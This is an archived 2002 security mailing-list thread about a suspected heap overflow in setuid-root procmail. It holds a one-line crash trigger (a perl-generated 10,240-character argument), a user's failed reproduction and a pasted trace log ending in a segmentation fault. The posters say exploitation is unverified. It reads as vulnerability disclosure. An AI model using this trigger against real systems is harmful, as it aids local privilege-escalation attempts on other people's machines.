I believe we (one of our researchers "dvdman") were messing with this a few months back ... we never finished up out research ... heres what I found in an old strace log... -KF malloc(86) = 0x0805e0c0 memmove(0x0805e0c4, 0x0805c9c8, 82, 1, 4096) = 0x0805e0c4 strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., '=') = "=a" setregid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0 setreuid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0 setuid(506) = 0 setegid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0 strncpy(0x0805c9c8, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 10000) = 0x0805c9c8 strlen(0x080577b1, 0x40192620, 0xbfffd048, 0x400de1de, 0) = 8 malloc(81) = 0x0805e120 memmove(0x0805e120, 0x080577b1, 8, 0x400de1de, 0) = 0x0805e120 strlen(0x08057d68, 0x080577b1, 8, 0x400de1de, 0) = 2 memmove(0x0805e128, 0x08057d68, 2, 0x400de1de, 0) = 0x0805e128 strlen(0x08057811, 0x08057d68, 2, 0x400de1de, 0) = 17 memmove(0x0805e12a, 0x08057811, 17, 0x400de1de, 0) = 0x0805e12a write(2, "procmail: Exceeded LINEBUF\n", 27) = 27 strchr("PROCMAIL_OVERFLOW=yes", '=') = "=yes" strncmp("PROCMAIL_OVERFLOW=yes", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 17) = 15strncmp("PROCMAIL_OVERFLOW=yes", "EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOF"..., 17 <unfinished ...> --- SIGSEGV (Segmentation fault) --- +++ killed by SIGSEGV +++ -KF SpaceWalker wrote: >$ procmail -v >procmail v3.15.1 2001/01/08 >$ procmail `perl -e '{print "A"x10240}'`=A >wait indefinitively >Doesn't seem to segfault on my system, I'm running base slackware 8 on x86. > >On Wed, 19 Jun 2002 02:38:08 +0200 >flatline <flatlineat_private> wrote: > >>hi, >> >>i found a heap overflow in procmail (up until latest) some time ago. >> >>flatline@intra:/usr/bin$ ls -la procmail >>-rwsr-xr-x 1 root mail 64344 Jun 3 2001 procmail* >>flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A >>procmail: Exceeded LINEBUF >>Segmentation fault >>flatline@intra:/usr/bin$ >> >>at first it seemed to properly drop privs before segging, but not too long >>ago i managed to make it crash while it still had euid 0. >>segfaults have been seen on red hat/slackware linux and bsd variants. >>successful exploitation has not been verified. >> >>/ flatline >> >>greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone >>who felt left out. >> > >
This archive was generated by hypermail 2b30 : Wed Jun 19 2002 - 11:16:31 PDT